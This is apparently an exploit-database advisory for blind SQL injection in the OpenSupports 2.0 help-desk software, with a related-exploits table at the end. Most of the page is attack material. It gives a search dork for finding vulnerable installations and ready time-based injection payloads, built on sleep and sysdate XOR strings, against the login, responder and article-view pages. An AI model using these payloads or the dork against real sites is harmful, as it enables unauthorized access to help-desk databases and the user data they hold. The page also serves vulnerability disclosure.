Open Support Blind SQL Injection v2.0 Vulnerability =================================================== Author indoushka ================= vendor :http://www.opensupports.com/files/Opensupports_v2_EN.rar ================= # Dork : Power by OpenSupports © 2009 - 2014. All Rights reserved This vulnerability affects /support/login.php emailcorreoelectronico=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&pass=g00dPa%24%24w0rD&Submit2=Login This vulnerability affects /support/responder.php. idarticulo=&name=&staff=no&Submit=Send&text_content=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ This vulnerability affects /support/verarticulo.php. /support/verarticulo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
Related Exploits
Trying to match OSVDBs (3): 104103, 104104, 104112Trying to match setup file: 6d44b3ae91377922f40d4e04850c7d47
Other Possible E-DB Search Terms: OpenSupports 2.0, OpenSupports
Date | D | V | Title | Author |
---|---|---|---|---|
2014-03-17 |
![]() |
OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery | TN CYB3R |